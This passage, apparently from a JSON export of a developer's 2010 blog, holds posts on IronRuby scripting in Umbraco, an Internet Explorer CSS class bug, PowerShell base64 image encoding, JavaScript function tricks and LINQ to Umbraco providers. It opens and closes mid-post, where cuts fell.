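    // Fall back to -1 if the node isn't deep enough, mirroring the Ruby rescue below.
    return ids.Length > level ? int.Parse(ids[level]) : -1;
}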
Since a path is always in a known format, a comma-separated string, we can make that into an array, and then path-from-there ;).\nlevel = 2 target_parent_id = currentPage.Path.split(',')[level].to_i rescue -1 Since we’re working with microsites here I don’t want the upper-most navigation point for the site, I want the point from the current microsite, so I’m finding the ID of the node at level 2, if you were doing a full site specify the array index position (aka level) to be 1.\nWe’re also doing a rescue here, and that will cause -1 to be returned if we for some reason don’t have an array that is at least 3 items long (it’s not required but it’s just safer and easier to recover from if you have an unexpected error).\nYou’ll also notice the to_i on the end, this method will convert the string (ie: “1234”) into a number (ie: 1234).\nNext we to actually find the parent, so we want to simulate the ancestor-or-self XPath select, which is really just a recursive function, and if there’s something that dynamic languages are great for that’s recursive functions.\nparent = currentPage parent = parent.Parent until parent.nil? || parent.Id == target_parent_id So what we’re doing here is calling the until loop method and assigning the value of parent to parent.Parent until one of the conditions returns true. This is similar to a do {...} while(...) statement in .NET languages, just a bit funkier ;).\nBringing it all together In addition to adding recursive parent lookups we’ve also decided to fix the script so that no navigation HTML is generated if there is no navigation to display. This can be done with a single-line if statement, which looks kind of cool:\nreturn if (parent && (parent.Children.empty? || parent.Children.any? {|c| c.GetProperty("umbracoNaviHide").Value != "1" })) || parent.nil? That’ll cause the script to exit if the parent wasn’t found or there aren’t any children to display.\nHere’s what the whole script looks like now:\nLibrary = Object.const_get("umbraco").const_get("library") target_parent_id = currentPage.Path.split(',')[2].to_i rescue -1 parent = currentPage parent = parent.Parent until parent.nil? || parent.Id == target_parent_id return if (parent && (parent.Children.empty? || parent.Children.any? {|c| c.GetProperty("umbracoNaviHide").Value != "1" })) || parent.nil? puts '<nav><ul id="navigation">' parent.Children.find_all { |c| c.GetProperty("umbracoNaviHide").Value != "1" }.each_with_index do |child, i| puts %Q{ <li class="#{'first' if i == 0}"> <a href="#{Library.NiceUrl(child.Id)}" class="#{'selected' if child.Id == currentPage.Id}" target="_self" title="Go to #{child.Name}">#{child.Name}</a> </li> } end puts '</ul></nav>' Happy Ruby-ing :)\n", "id": "2010-11-27-umbraco-menu-with-ironruby" }, { "title": "Some tips and tricks for working with IronRuby and Umbraco", "url": "https://www.aaron-powell.com/posts/2010-11-27-umbraco-ironruby-tips-and-tricks/", "date": "Sat, 27 Nov 2010 00:00:00 +0000", "tags": [ "umbraco", "ironruby" ], "description": "Some things which I've learnt while working with IronRuby in Umbraco", "content": "Note: The following has been tested in Umbraco 4.5.2 on .NET 3.5, and it works on my machine\nModularizing your IronRuby filesHaving the ability to break a large file into a set of smaller files is quite an important aspect of any kind of programming, and it’s a concept that is in all the languages that Umbraco supports. 
XSTL has <xsl:include, .NET has types, but what about DLR scripts?\nIronRuby (and IronPython) allow you to break files into smaller files, but how do you then include them?\nI’ve seen examples with IronPython of peeople doing Server.MapPath("~/python") and having it all included like that, but with IronRuby (and I’m assuming IronPython) it isn’t that complex.\nScript settings file There’s a file called ~/config/scripting.config which is a little gem here. It’s the file that you modify if you want to do something like add an additional DLR language (like LOLCode), but what’s more interesting is this section:\n<options> </options> Full information about the DLR hosting specification can be found here (and it goes into more details about this config section) but in short you can use this to pass folders into the script.\nHere’s a good sample (and what we’re using):\n<options> <set language="Ruby" options="LibraryPaths" value="python" /> </options> What we’re configuring here is:\nSetting the language to target as Ruby (you can use something from the names part of the language definition Specifying that we want to include the ~/python folder, using the LibraryPaths option. This is the important one, the folders start from the root of your website (ie: /) so anything that’s inside your site can be added (ok, that’s not entirely true but it’s true enough :P) Now when each script is loaded it will include references to anything else in your ~/python folder, sweet :D.\nAdding external files Now that you know how to ensure that all external script files are available to each other how do you actually use them? Well with IronRuby it’s really simple:\nrequires "MyAwesomeRubyScript" Chuck that at the top of your file and then everything will be available to you from that script file. You can even create master includes so you can include specific scripts through 1 additional include:\nSomeIncludes.rb\nrequires "MyAwesomeScript" requires "SomeOtherScript" MainScript.rb\nrequires "SomeIncludes" #work against what was defined in MyAwesomeScript.rb Working with XMLIn case you hadn’t already noticed Umbraco has a lot of integration with XML, and although there is a .NET API and DLR workings sometimes you’re just kind of stuck with XML. Take for example using the Related Links data type, that stores XML into the property value, which is great in XSLT, but how do you go with it in the DLR?\nWell I came across a neat little script today for working with IronRuby and XML, which you can get too. And using the tip from above we can include it into any script file we need.\nLet’s make a basic IronRuby macro which will render a Related Links data type as a <ul>:\nAssumptions: We have the XML helper I linked about in a file called xml.rb. 
We have a property on the current node called QuickLinks.\nQuickLinks.rb Here’s a simple little Ruby script to turn our property into some HTML:\nrequires 'xml' links = currentPage.get_property('quickLinks').value xmlDoc = Document.new(links) html = '<ul>' i = 0 xmlDoc.elements('links/link') do |e| html << %Q{ <li class="#{'first ' if i == 0 }#{e.get('@type').value}" target="#{'_blank' if e.get('@newwindow').value == '1'}"> <a href="#{e.get('@link').value}" title="#{e.get('@title').value}">#{e.get('@title').value}</a> </li> } i+=1 end html << '</ul>' puts html This will create a new XML object which we can use in the Ruby script; we then run an XPath statement to find the link items and then iterate through them.\nThe XML library I used has a few shorthand methods such as get that allow us to grab a contextual XPath statement result (it translates to XmlNode.SelectSingleNode internally) so we can quickly access the attributes and their values. I’ve also shown you how to use each attribute to build your list.\nAnd there you go, a Ruby script which you can use to create your very own related links :).\nRuby-style naming Although this tip isn’t specific to the Umbraco usage of IronRuby it’s a good tip to know if you’re doing IronRuby coding. The Ruby naming conventions are not like the .NET naming conventions; rather than using PascalCase they go with underscores to break up words, so where in .NET we’d write a method name like HelloWorld(...), in Ruby we’d write hello_world(...).\nThe smart folks behind IronRuby have taken this into account, and we can actually use Ruby-style naming even with .NET objects.\nPreviously I’ve shown how to build a menu with IronRuby, well if you wanted to make it more Ruby-esque you can actually do this:\nparent.children.find_all { |c| c.get_property("umbracoNaviHide").value != "1" }.each_with_index do |child, i| puts %Q{ <li class="#{'first' if i == 0}"> <a href="#{Library.nice_url(child.id)}" class="#{'selected' if child.id == currentPage.id}" target="_self" title="Go to #{child.name}">#{child.name}</a> </li> } end I’ve made a few subtle changes, like:\nc.get_property("umbracoNaviHide").value Or even\nLibrary.nice_url(c.id) Now it looks truly like a Ruby script, and not a .NET developer’s wild attempt to be up with the hip kids playing with Ruby :P.\n", "id": "2010-11-27-umbraco-ironruby-tips-and-tricks" }, { "title": "Internet Explorer bug with assigning CSS classes", "url": "https://www.aaron-powell.com/posts/2010-11-10-ie-bug-with-assigning-css-classes/", "date": "Wed, 10 Nov 2010 00:00:00 +0000", "tags": [ "css", "javascript", "internet-explorer", "web" ], "description": "An interesting problem when assigning CSS classes in JavaScript", "content": "Today I was fixing a problem on a site in which some background images weren’t showing up on certain elements in Internet Explorer but they were showing up under Firefox and Chrome.\nThe page is quite a complex one which does a lot of client-side building of DOM elements so I started digging around in there, finding the section which was creating the element.\nThe code was very simple, all it did was create a <span /> tag, assign some CSS classes to it and eventually add it to the DOM. Nothing overly complex about it but it was breaking nonetheless.\nSo I fired up the (lovely…) IE7 (yes, I’m on a SOE with IE7) and inspected the DOM. Sure enough the element was in the DOM, but when I looked at the applied styles in the inspector I noticed that the styles from the CSS class did not exist.
According to the DOM inspector the CSS class was applied, just none of the rules were. I started to be confused, I tried manipulating the stylesheet, adding some more sizing to the element, but nothing caused the rules to be applied. But if I started playing in the DOM inspector I could influence it but only with what I was custom adding.\nAfter scratching my head for a while I took another look at the element creation process, and then I noticed something very strange…\nspan.setAttribute('class', 'someClass'); The developer who wrote the JavaScript was using setAttribute method on the DOM element to set the CSS class, not the className property. I’ve never done it via the method, so I changed it to use the property and vola the CSS class was applied!\nI then created a very simple little piece of HTML to test with to ensure it wasn’t something more of a problem from the overall page, but it always fails in IE, here’s my sample code:\n<html> <head> <title>IE CSS assignment testing</title> <style type="text/css"> .c { background-color:#ff0000;} .s { padding-top:10px; background-color:#00ff00;} </style> </head> <body> <div id="s"></div> <script type="text/javascript"> var txt = document.createElement('span'); txt.innerHTML = "Hello World"; txt.setAttribute('class', 'c'); var s = document.getElementById('s');\ts.appendChild(txt); s.setAttribute('class', 's'); </script> </body> </html> Save that as a HTML file and open it in IE7, IE9 Beta (I don’t have 8 or 6 on a machine), Firefox 3.6.11 and Chrome 8. In both the IEs I tested the background colour & padding is not applied, despite the inspector saying that the element has the classes applied to it.\nI’ll be reporting this as a bug in IE shortly, but of future note to developers use element.className not elemnet.setAttribute for CSS class assignment!\n", "id": "2010-11-10-ie-bug-with-assigning-css-classes" }, { "title": "Base64 Encoding of Images via Powershell", "url": "https://www.aaron-powell.com/posts/2010-11-07-base64-encoding-images-with-powershell/", "date": "Sun, 07 Nov 2010 00:00:00 +0000", "tags": [ "powershell" ], "description": "Turning an image into a string... simply", "content": "Recently I was doing some CSS for a client but there was a bit of a problem with putting stuff into source control, basically there was a release coming up from one section of the source tree that I needed to put some images into for the CSS, but because they weren’t approved for this release I couldn’t commit them.\nThe new CSS wasn’t going to be included in this release either, but I wanted to get at least some stuff source controlled (it’s in a different part of the tree so I could commit it) and to achieve this with the images I decided to use base64 encoding.\nIf you’re not aware something that modern browsers (like IE8+, FF, Chrome, etc) are starting to support is RFC 2397 which is also known as the “data” URI scheme. The basic premise behind this (if you’re not interested in reading the whole spec yourself :P) is to allow you to embed an encoded version of a URI response in place of the URI itself. 
This allows you to do funky stuff like this:\n<IMG SRC="data:image/gif;base64,R0lGODdhMAAwAPAAAAAAAP///ywAAAAAMAAw AAC8IyPqcvt3wCcDkiLc7C0qwyGHhSWpjQu5yqmCYsapyuvUUlvONmOZtfzgFz ByTB10QgxOR0TqBQejhRNzOfkVJ+5YiUqrXF5Y5lKh/DeuNcP5yLWGsEbtLiOSp a/TPg7JpJHxyendzWTBfX0cxOnKPjgBzi4diinWGdkF8kjdfnycQZXZeYGejmJl ZeGl9i2icVqaNVailT6F5iJ90m6mvuTS4OK05M0vDk0Q4XUtwvKOzrcd3iq9uis F81M1OIcR7lEewwcLp7tuNNkM3uNna3F2JQFo97Vriy/Xl4/f1cf5VWzXyym7PH hhx4dbgYKAAA7" ALT="Larry"> This technique can also be used with CSS, in background images, and it’s what I decided to go with. But how do you convert an image to a base64 string? There’s plenty of helper sites on the web, or maybe you can write a C# console application to do it.\nI decided to go a bit different with it, since it was something I’d be doing a few times I wanted it to be quite to write and easy to run, so Powershell was what I decided to go with.\nSo I hit up Jason Stangroome for some Powershell wizardry (read: he told me what to code) and came up with a nifty 2-line Powershell file:\nParam([String]$path) [convert]::ToBase64String((get-content $path -encoding byte)) You then use it like so:\nPS> .\\ImageToBase64.ps1 C:\\Path\\To\\Image.png >> base64.txt Jason thinks you can do it with only a single line script by putting the Param declaration on the same line of convert statement, but I think that having it on 2 lines should be fine :P.\n", "id": "2010-11-07-base64-encoding-images-with-powershell" }, { "title": "JavaScript functions are objects", "url": "https://www.aaron-powell.com/posts/2010-10-23-javascript-functions-are-objects/", "date": "Sat, 23 Oct 2010 00:00:00 +0000", "tags": [ "javascript", "web" ], "description": "JavaScript functions are more than just functions", "content": "I think it’s well known just how much I enjoy JavaScript, especially since there’s a few really funky things I’ve written about in the past.\nBut in this article I’m going to look at something else that’s not commonly realised about JavaScript, that a function is actually just an object.\nFunctions 101 There’s a couple of ways which you can write a function in JavaScript, you can write them anonymously:\n$(function() { //do stuff }); You can name them:\nfunction add(x, y) { return x + y; } Or you can assign them to a variable:\nvar add = function(x, y) { return x + y; }; Each type of function declaration type has a different ideal usage, anonymous functions are best if you’re wanting to pass around single use functions, where as if you’re naming them it’s best if you want to reuse the function and assigning it to a variable (which you can name it at the same time) works in the a very similar fashion (I’m sure there’s differences but I haven’t read the full ECMA 262 spec so I’m not sure the differences :P).\nJavaScript functions always return a value, even if you don’t have a return statement (in which case they return undefined) so you can return objects, built-in types (like boolean, number, etc) or even return functions.\nSo as you can see functions are really quite powerful.\nBeyond function basics Let’s have a look at how we can work with functions beyond the basics of them, let’s take a function that we’re assigning to a variable:\nvar add = function(x, y) { return x + y; }; By doing this we’ve got a variable named add which we can use like this:\nvar x = add(1,1); //x === 2 Well there’s a though, could you add a property to the variable add? 
Maybe we could use this to add a description for the function that we’re working with…\nadd.desc = "Adds two numbers together"; alert(add.desc); That’s perfectly valid because… functions are objects. That’s right, anything you could do to a “standard object” you can do to a function. In fact, you can even have a function property on a function, like this:\nvar add = function(x, y) { return x + y; }; add.add = add; alert(add.add(1,1)); //alerts 2 Ok, so this isn’t really that useful an example, but it does kind of prove a point.\nThis whole concept of functions-are-objects is core in a lot of JavaScript frameworks. Take jQuery for example, you can do this which will invoke a function:\njQuery('div'); Or you can do this which will work against jQuery as an object:\njQuery.ajax(...); And as you can see it’s all through a single entry point of the jQuery object that we’re either working with it as a function or as an object.\nTaking it another step So if our function is an object, what can we do with it, can we do anything really trippy? How about having a function that describes itself after it runs? How can we do that?\nWhen a function runs there is a special variable which you get passed in called arguments. This variable knows a few things about what’s happening such as:\nThe name of the function The arguments passed into it The object that called the function By using the arguments object we could start describing the function, like so:\nvar add = function(x, y) { arguments.callee.lastCall = { 'x': x, 'y': y }; return x + y; }; add(1,2); alert(add.lastCall.x); //alerts 1 Sweet, we can now find out about the last invocation of the function!\nConclusion In this article we’ve looked into some of the fun things you can do with JavaScript functions, and how you can use a function as more than just a way to perform operations, but get them to describe themselves while they are running.\nWhether or not this is overly ideal in what you’re doing it’s up to you, but it’s definitely something that could be handy if you’re writing your own JavaScript mocking framework :P.\n", "id": "2010-10-23-javascript-functions-are-objects" }, { "title": "DocumentDataProvider - Creating a custom LINQ to Umbraco Tree", "url": "https://www.aaron-powell.com/posts/2010-10-01-documentdataprovider-tree/", "date": "Fri, 01 Oct 2010 00:00:00 +0000", "tags": [ "umbraco", "linq-to-umbraco" ], "description": "Creating a custom LINQ to Umbraco provider - implementing a Tree", "content": "This article covers part of the DocumentDataProvider from the LINQ to Umbraco Extensions project.\nOverviewWhen you create a custom LINQ to Umbraco data provider there are a number of classes which you need to implement, this article will look at how to implement the Tree<T> class.\nBut what is the point of the Tree<T> class for? The class is responsible for most of the heavy lifting for a particular type. The Tree<T> object is actually what is returned when you access a collection from the UmbracoDataContext that you generate from the code generator. 
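To picture where Tree<T> sits, here’s roughly what consuming code ends up looking like; MyUmbracoDataContext is a made-up name standing in for whatever the code generator produced for your site, while TextPages, BodyText and NodeName follow the examples used elsewhere in these posts:

using System;
using System.Linq;

class TreeUsageSketch
{
    static void Main()
    {
        // The generated data context exposes one collection per document type;
        // each of those collections is a Tree<T> under the hood.
        var ctx = new MyUmbracoDataContext();   // hypothetical generated context

        // Enumerating the collection is what ends up calling Tree<T>.GetEnumerator().
        var pages = ctx.TextPages.Where(p => p.BodyText.Contains("Umbraco"));

        foreach (var page in pages)
        {
            Console.WriteLine(page.NodeName);
        }
    }
}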
It is also what you push new objects into (assuming that the implementation supports CRUD), in fact it’s comparable to the Table<TEntity> class which is used by LINQ to SQL (since LINQ to Umbraco is modeled after LINQ to SQL).\nImplementing Tree<T> To implement the class you need to inherit from the abstract class, umbraco.Linq.Core.Tree<TDocType>, like this:\npublic class DocumentTree<TDocType> : Tree<TDocType> { } The next thing you have to do is implement the abstract class, of which there are 6 abstract methods and 1 abstract property, so the basic implementation will look like this:\npublic class DocumentTree<TDocType> : Tree<TDocType> { public override UmbracoDataProvider Provider { get; protected set; } public override void DeleteAllOnSubmit(IEnumerable<TDocType> items) { throw new NotImplementedException(); } public override void DeleteOnSubmit(TDocType item) { throw new NotImplementedException(); } public override IEnumerator<TDocType> GetEnumerator() { throw new NotImplementedException(); } public override void InsertAllOnSubmit(IEnumerable<TDocType> items) { throw new NotImplementedException(); } public override void InsertOnSubmit(TDocType item) { throw new NotImplementedException(); } public override void ReloadCache() { throw new NotImplementedException(); } } Here nothing is implemented, and it’s up to you to work out exactly what you want to implement; the most important one is GetEnumerator(). Since LINQ to Umbraco implements IEnumerable under the hood (not IQueryable) this is the primary method that will be needed, so we’ll focus on that.\nImplementing the constructor The first step that we need to do is implement a constructor. It’s not really useful if we can’t create the tree that we’re going to be working with, now is it :P.\nSince I don’t want to have people creating this type themselves (I only want it to be created as part of the overall data provider), I’m going to give it an internal constructor:\nprivate IEnumerable<Document> docs; private DocumentType docType; private Dictionary<int, TDocType> cache; private UmbracoInfoAttribute umbracoInfoAttribute = ReflectionAssistance.GetUmbracoInfoAttribute(typeof(TDocType)); internal DocumentTree(UmbracoDataProvider dataProvider) { Provider = dataProvider; cache = new Dictionary<int, TDocType>(); docType = DocumentType.GetByAlias(umbracoInfoAttribute.Alias); } Here I’m setting the provider that this instance knows about to the one that was passed in. Ultimately it is being passed in as the base type, but you can use a tighter type if you want. Next I’m setting up a cache for the items that we’re going to be finding in this provider (more on that shortly) and we’re storing the Document Type from Umbraco that maps to the LINQ to Umbraco type that we know about.\nYou’ll notice that I’ve got a field called umbracoInfoAttribute, this is a local reference to the attribute information which LINQ to Umbraco generates. We’ll need this a bit later so it’s probably a good idea to keep it handy.
The ReflectionAssistance class ships as part of LINQ to Umbraco for your convenience.\nOnward ho!\nImplementing GetEnumeratorNow that we can create out Tree<T> instance lets look at how to implement the GetEnumerator method so we can start retrieving our data.\npublic override IEnumerator<TDocType> GetEnumerator() { //we'll cache the documents from Umbraco if(docs == null) docs = Document.GetDocumentsOfDocumentType(docType.Id); throw new NotImplementedException(); } Cuz we’re going to get all the Document objects from the Umbraco store we’ll actually cache it so we don’t completely hammer the database!\nNext we’ll loop through each of these documents and start creating a LINQ object which maps from it:\npublic override IEnumerator<TDocType> GetEnumerator() { //to try and prevent the performance problems of hitting the DB we'll expect that this may be loaded already if(docs == null) docs = Document.GetDocumentsOfDocumentType(docType.Id); //go through each document foreach (var doc in docs) { int id = doc.Id; //check if we've got a cached version of the doc, if so we'll just use that, otherwise we need to do some setup if (!cache.ContainsKey(id)) { } //use yield return so we can try and squeeze performance out. This way if say you're using a Take you can break early without fully loading the stuff from the DB yield return cache[id]; } } So here’s the skeleton for what we’re going to do, we’ll iterate through all the documents and then look at our LINQ cache, and once it’s in our cache we’ll use yield return so that we can lazy run them (if you’re not familiar with the yield keyword check it out on MSDN).\nNow let’s look at how to create our LINQ object.\nif (!cache.ContainsKey(id)) { //create our LINQ doc and setup the 'standard' properties var linqDoc = new TDocType(); SetupStandardProperties(doc, linqDoc); //find all the user-defined properties, LINQ to Umbraco decorates them with the PropertyAttribute var properties = linqDoc .GetType() .GetProperties(BindingFlags.Public | BindingFlags.Instance) .Where(p => p.GetCustomAttributes(typeof(PropertyAttribute), true).Count() > 0) ; foreach (var p in properties) { //get the UmbracoInfo attribute (it'll have the alias) var attr = ReflectionAssistance.GetUmbracoInfoAttribute(p); //do some case-normalization of the attribute and then we'll grab the value from the document var data = doc.getProperty(Casing.SafeAlias(attr.Alias)).Value; p.SetValue(linqDoc, Convert.ChangeType(data, p.PropertyType), null); } //add the doc to our cache cache.Add(id, linqDoc); } So we’re doing quite a bit of stuff here, first we’re creating a new instance of the object we’re needing, and then we’ll set up the “standard” properties (properties such as ID, NodeName, etc, we’ll look at that implementation shortly).\nNext we want to find all the Umbraco properties, we’ll use reflection to find all the public instance properties (using the BindingFlags enum) that have the attribute of PropertyAttribute which comes from LINQ to Umbraco’s code generator. 
We do this check because we’re generating partial classes you can add your own properties if you want, properties outside of Umbraco.\nThen we’ll iteration through them all, find the alias from Umbraco and then request the property data from the Umbraco API and lastly set it onto the LINQ object using refelction!\nLastly we put this LINQ object into cache so we don’t have to create it next time.\nPhew, that was a tricky bit!\nAs I mentioned we have a class for setting up the standard Umbraco properties:\nprivate static void SetupStandardProperties(Document doc, TDocType linqDoc) { //set some of the private properties on the object var type = linqDoc.GetType(); { var prop = type.GetProperty("Id"); prop.SetValue(linqDoc, doc.Id, null); } { var prop = type.GetProperty("CreatorID"); prop.SetValue(linqDoc, doc.Creator.Id, null); } { var prop = type.GetProperty("CreatorName"); prop.SetValue(linqDoc, doc.Creator.Name, null); } { var prop = type.GetProperty("Version"); prop.SetValue(linqDoc, doc.Version.ToString(), null); } linqDoc.NodeName = doc.Text; linqDoc.CreateDate = doc.CreateDateTime; linqDoc.UpdateDate = doc.UpdateDate; linqDoc.SortOrder = doc.sortOrder; linqDoc.TemplateId = doc.Template; } You’ll notice four funky things at the top of this method, this is because some of the LINQ to Umbraco properties have private setters, but we can do it with reflection (ahh reflection, is there anything it can’t do :P). There is a good reason that these properties don’t have a public setter, it’s means that some of the stuff can’t be “screwed with” unless you want it to be. Yes this is a design decision that you’ll have to live with :P.\nConclusionSo we’re done with our basic implementation of the DocumentTree<T> class. There’s plenty more things to do if you want to support CRUD operations, and that’ll be covered in a dedicated article.\n", "id": "2010-10-01-documentdataprovider-tree" }, { "title": "A set of extensions for LINQ to Umbraco", "url": "https://www.aaron-powell.com/posts/2010-09-30-linq-to-umbraco-extensions/", "date": "Thu, 30 Sep 2010 00:00:00 +0000", "tags": [ "umbraco", "linq-to-umbraco", "linq-to-umbraco-extensions" ], "description": "Making LINQ to Umbraco way more awesome", "content": "LINQ to Umbraco is awesome, let’s not deny it, but I had a thought of how could I make it even more awesome…\nThere was a lot of things that I wanted to achieve with LINQ to Umbraco that couldn’t be done in the time frame of the Umbraco 4.5 release, and some things which aren’t really applicable in the context of the Umbraco core.\nSo this project will aim to fill in the gaps that LINQ to Umbraco leaves out of the core of Umbraco.\nSource and releases Source Code Current Release (coming soon) DocumentDataProvider Overview\nCreating a DocumentTree class\n", "id": "2010-09-30-linq-to-umbraco-extensions" }, { "title": "JavaScript functions that rewrite themselves for a Singleton pattern", "url": "https://www.aaron-powell.com/posts/2010-09-30-javascript-singleton/", "date": "Thu, 30 Sep 2010 00:00:00 +0000", "tags": [ "javascript", "web" ], "description": "Time for more crazy JavaScript, functions that can rewrite themselves!", "content": "Recently I was building a JavaScript application which was quite complex and involved a bit of server interaction with some AJAX requests. 
The AJAX was just doing some one-time data loading, and the reason I was using AJAX was to lazy-load some of the information on the page.\nSince the methods going back to the server were to be called multiple times and I wanted caching of the server response I needed to have the method a bit aware that the server call had responded and not to do it again. Essentially what I was wanting to do was have a Singleton implemented, but this is really just a method call, so we need to Singleton a method… hmm…\nWell let’s have a look at how to do that.\nFunctions writing functionsLet’s think about what we’re trying to do here, we’re trying to make a function run and then run again but perform a bit differently the next time around, and there’s a few different ways to do this. One of the ways you can do this is with logic branches, if something then ... else ... endif, sure that’s easy, but it’s totally not crazy enough for me, could we do if something then replace function else call original endif? Well the answer is yes, and that’s what we’re going to do, the function is going to rewrite itself during its execution!\nIt’s exploitation I tell you!So what we’re wanting to do is take advantage of the way that JavaScript closure works. I’m not going to go into detail about explaining closure, if you’re interested check this post out, but what we’re going to use is the fact that a variable defined outside a function can be assigned within that function.\nLet’s look at a very basic example:\nvar fn; fn = function() { fn = function() { console.log("I've been replaced!"); }; console.log("Thanks for the call"); }; fn(); //Thanks for the call fn(); //I've been replaced! If you run this in a browser (that supports console.log, eg: Firefox, Chrome and IE9) the first time the function is called you’ll get the output Thanks for the call and then every subsequent call will output I’ve been replaced!.\nAwesome!\nThe reason this works is because we’re creating a variable called fn which we can access within the scope of then fn function body, and because we can access the variable we can reassign it! So when fn runs it rewrites itself, but it has its own function body that it executes.\nThis allows you to do some crazy things, like this:\nvar fn; fn = function() { fn = function() { fn(); }; console.log("Thanks for the call"); }; fn(); //Thanks for the call fn(); //results in a stack overflow I wouldn’t advise this, it’s a good way to make a mess of some code :P. This was more just to illustrate a point.\nReal world scenarioThe example we’ve seen above is fairly sandboxed, it doesn’t really take into account the method being a method of a JavaScript object, doesn’t take into account the AJAX or anything like that. It illustrates the point nicely, but let’s expand on it.\nFirst off let’s create a little JavaScript object to play with:\nmyObject = (function() { var _this; _this = { getData: function(callback) { } };\treturn _this; })(); I’m creating an object called myObject (imaginative I know) that will be sitting at the window level, and had a single public method getData(callback). The method will take a function as an argument which we’ll invoke when the server response is completed. 
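To keep the calling side in mind while we fill in the body, here’s roughly how the method gets consumed; the logging is made up, but the point is that a later call should never need another trip to the server:

// First call: goes off to the server, then hands the response to the callback.
myObject.getData(function (data) {
    console.log('first call', data);
});

// A later call: by now the method has rewritten itself, so the cached response
// is handed straight to the callback without another AJAX request being made.
myObject.getData(function (data) {
    console.log('second call', data);
});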
Doing a callback for an AJAX request is an easy way to expose the successful response method without having to expose the AJAX API.\nNow let’s go about implementing the body of the function:\nmyObject = (function() { var _this; _this = { getData: function(callback) { $.ajax({ type: "POST", contentType: "application/json; charset=utf-8", url: '/MyService.asmx/SomeMethod', success: function (data) { _this.getData = function(callback) { callback.apply(_this, [data]); }; callback.apply(_this, [data]); } }); } };\treturn _this; })(); Here we’re using jQuery (it’ll just make it a bit less verbose for the demo) and then we’re calling a web service method, that is all fairly standard, the interesting stuff is within the body of the success property:\nsuccess: function (data) { _this.getData = function(callback) { callback.apply(_this, [data]); }; callback.apply(_this, [data]); } This is the function which jQuery will invoke when the server successfully returns (and we’re assuming that it returns some data). When the method is called we’ll execute the callback (and by using callback.apply we can specify the internal scope of the object, so the this scope will be the myObject).\nAnd like we did in our early example here we’re running a piece of code to rewrite the function when it executes. The thing is that we now have an object, so we can’t use the trick we were using before, instead this time what we’re doing is assigning the method on the object which was created. This is the key point here, if we don’t have a reference back to the object then we can’t reassign it. It is true that this demo could use myObject.getData, since it’s a static method on the object, but I wanted the demo to cover if you are using a class implementation.\nConclusionThat wraps it all up, we’ve see how we can create functions in JavaScript which will rewrite themselves to simulate a Singleton. The ultimate usefulness of this code is up for debate, but it is a good example of how you can do some really funky stuff with JavaScript.\nJust be careful you don’t make your rewriting functions too smart or they may become sentient!\n", "id": "2010-09-30-javascript-singleton" }, { "title": "Overview of the DocumentDataProvider", "url": "https://www.aaron-powell.com/posts/2010-09-30-documentdataprovider-overview/", "date": "Thu, 30 Sep 2010 00:00:00 +0000", "tags": [ "umbraco", "linq-to-umbraco", "linq-to-umbraco-extensions" ], "description": "What is the DocumentDataProvider, why does it exists, and how can it complete me?", "content": "##Overview\nIf you’ve read my article on Understanding LINQ to Umbraco (and if you haven’t you really should go do that) you’ll know that LINQ to Umbraco does have the scaffolding for doing full CRUD operations. But with CRUD it is up to the underlying UmbracoDataProvider implementation to support.\nBecause the OOTB UmbracoDataProvider instance, the NodeDataProvider is only concerned with how to access the in-memory cache so having full CRUD doesn’t make sense.\nThis is where the DocumentDataProvider fits in; like its name suggests it is designed to work with the Umbraco Document API, which is responsible for performing CRUD operations. So the ultimate goal of the DocumentDataProvider will be to provide full CRUD operations against the Umbraco database.\nDocumentDataProvider vs NodeDataProvider So if the goal of the DocumentDataProvider is to provide full CRUD where will that leave NodeDataProvider? Well they should still sit side-by-side. 
For your common usage you should still use the NodeDataProvider, this will only be interacting with published content, and the in-memory cache. The DocumentDataProvider on the other hand will be interacting with the Document API, this means that it’ll be tied to the SQL instance, and doing read operations will suffer from the same performance limitations that you can find from the Document API. There will be caching built into the DocumentDataProvider, but by-and-large there will be limits to how that can help.\n", "id": "2010-09-30-documentdataprovider-overview" }, { "title": "Using Lazy with KeyedCollection", "url": "https://www.aaron-powell.com/posts/2010-09-22-lazy-keyedcollections/", "date": "Wed, 22 Sep 2010 00:00:00 +0000", "tags": [ ".net", "collections" ], "description": "How to create and return KeyedCollection which use Lazy under the hood", "content": "For a project which I’m currently working on I’ve got a few custom collections which I need to return from various methods on a data repository. There’s a bit of heavy lifting that is done in each of the repository methods so I wanted to have a way which each of them could be lazy loading the items into the collection. This would also mean that if you’re only wanting a subset of the collection you don’t create all the objects.\nSince the collections are representing a data model I decided that I’d go with the KeyedCollection, as it’s a well designed collection for what I need, similar to a List but had a key for each item. And since we’re representing a data model having a key is important.\nThere’s a handy class in the .NET 4.0 framework which I wanted to use, Lazy<T> which is handy as it takes a lambda statement into the constructor so that I defer the object creation.\nIntroducing KeyedCollection If you haven’t worked with KeyedCollection before it’s quite a handy class. It’s an abstract class so you have to implement it when ever you want to use it. The reason for this is that you have to implement a method called GetKeyForItem which tells the collection how to resolve the key for each item. This is where KeyedCollection differs from the Dictionary class; for a Dictionary you need to pass in the key value each time.\nI’m sure you can see the advantage of the KeyedCollection now for what I’m doing, it can reduce code smell quite nicely.\nGetting Lazy So let’s get started with making a collection which is lazy and we’ll have a look at something which tripped me up when implementing it.\nFor the purpose of this blog I’ve got some stubbed out classes that could represent a data entity, one called Id:\nclass Id { public string Alias { get; set; } public string Name { get; set; } } This will be the key in our collection, and an Entity class:\nclass Entity { public Id Id { get; set; } public DateTime CreatedDate { get; set; } } We’ll be creating an implementation of KeyedCollection and lets start with our basic class:\nclass LazyKeyedCollection<T> : KeyedCollection<Id, Lazy<T>> where T : Entity { protected override Id GetKeyForItem(Lazy<T> item) { throw new NotImplementedException(); } } In this implementation I’ve made the collection a generic so that you can sub-class out the Entity object (which is likely if we were implementing this into a full-scale application, as I’m doing). 
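Before wiring Lazy<T> into the collection, it’s worth a quick refresher on what it actually buys us; this is just standard .NET 4.0 behaviour, shown here using the Entity class from above:

using System;

class LazyRefresher
{
    static void Main()
    {
        // The factory lambda is stored, not run, when the Lazy<T> is constructed.
        var lazyEntity = new Lazy<Entity>(() =>
        {
            Console.WriteLine("Creating the entity now");
            return new Entity { CreatedDate = DateTime.Now };
        });

        Console.WriteLine("Nothing has been created yet");

        // The first access to .Value runs the factory; every access after that reuses the same instance.
        Console.WriteLine(lazyEntity.Value.CreatedDate);
        Console.WriteLine(lazyEntity.Value.CreatedDate);
    }
}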
